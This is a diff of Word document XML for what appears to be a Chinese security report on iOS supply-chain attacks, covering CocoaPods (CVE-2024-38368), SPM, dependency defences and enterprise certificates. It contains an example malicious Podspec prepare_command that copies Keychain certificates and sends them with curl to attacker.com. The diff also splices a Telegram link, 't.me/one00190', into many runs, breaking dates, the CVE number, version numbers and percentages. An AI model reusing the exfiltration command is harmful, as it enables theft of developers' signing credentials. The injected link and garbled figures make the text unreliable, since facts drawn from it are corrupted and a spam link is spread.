-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4799,7 +4765,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">2024 </w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">24 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4821,11 +4799,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4842,15 +4815,22 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>CVE-2024-38368</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>24-38368</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4890,11 +4870,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4910,11 +4885,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4979,9 +4949,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -5015,9 +4982,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -5051,9 +5015,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -5123,9 +5084,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -5165,9 +5123,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">5. </w:t>
@@ -5187,11 +5142,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5208,45 +5158,82 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
+        <w:t>恶意</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>恶意</w:t>
+        <w:t xml:space="preserve"> Podspec </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Podspec </w:t>
+        <w:t>中的</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>中的</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> prepare_command</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>spec.prepare_command = &lt;&lt;-CMD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> prepare_command</w:t>
+        <w:t xml:space="preserve">  # </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>窃取开发者签名证书</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5261,29 +5248,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>spec.prepare_command = &lt;&lt;-CMD</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  # </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>窃取开发者签名证书</w:t>
+        <w:t xml:space="preserve">  cp ~/Library/Keychains/*.cert /tmp/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5298,7 +5263,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  cp ~/Library/Keychains/*.cert /tmp/</w:t>
+        <w:t xml:space="preserve">  curl -X POST https://attacker.com/steal -d @/tmp/*.cert</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5313,30 +5278,10 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  curl -X POST https://attacker.com/steal -d @/tmp/*.cert</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>CMD</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5355,9 +5300,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5387,7 +5329,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;70% </w:t>
+        <w:t>&gt;7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">% </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5412,9 +5366,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5451,9 +5402,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5463,11 +5411,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5486,15 +5429,24 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CocoaPods 1.15.0+ </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>CocoaPods 1.15.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5507,9 +5459,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5534,9 +5483,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5560,11 +5506,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc242275489"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc242275489"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5577,14 +5520,9 @@
         </w:rPr>
         <w:t>攻击面</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5610,15 +5548,11 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t xml:space="preserve">SPM </w:t>
       </w:r>
       <w:r>
@@ -5656,9 +5590,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5782,11 +5713,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5820,12 +5746,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -5897,12 +5817,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -5989,12 +5903,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -6074,12 +5982,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -6145,12 +6047,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -6239,11 +6135,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6262,9 +6153,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6373,9 +6261,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6388,9 +6273,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6414,11 +6296,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc242275490"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc242275490"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6443,14 +6322,9 @@
         </w:rPr>
         <w:t>应用）</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6466,11 +6340,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6533,11 +6402,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6572,12 +6436,6 @@
         <w:gridCol w:w="2294"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6672,12 +6530,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6714,7 +6566,19 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2018-11</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>18-11</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6776,12 +6640,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6818,7 +6676,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2021-03</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>21-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6880,12 +6762,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6922,7 +6798,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2022-03</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>22-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6984,12 +6884,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -7026,7 +6920,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2026-05</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>26-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7090,11 +7008,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7113,9 +7026,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7152,9 +7062,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7191,9 +7098,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7230,9 +7134,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7268,16 +7169,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc242275491"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc242275491"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t xml:space="preserve">3.4 </w:t>
       </w:r>
       <w:r>
@@ -7286,7 +7183,7 @@
         </w:rPr>
         <w:t>依赖管理攻击的通用防御</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -7307,12 +7204,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7384,12 +7275,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7490,12 +7375,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7561,12 +7440,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7667,12 +7540,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7766,12 +7633,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7851,12 +7712,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -7926,28 +7781,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc242275492"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc242275492"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>四、分发渠道攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc242275493"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc242275493"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7960,14 +7808,9 @@
         </w:rPr>
         <w:t>企业证书滥用</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
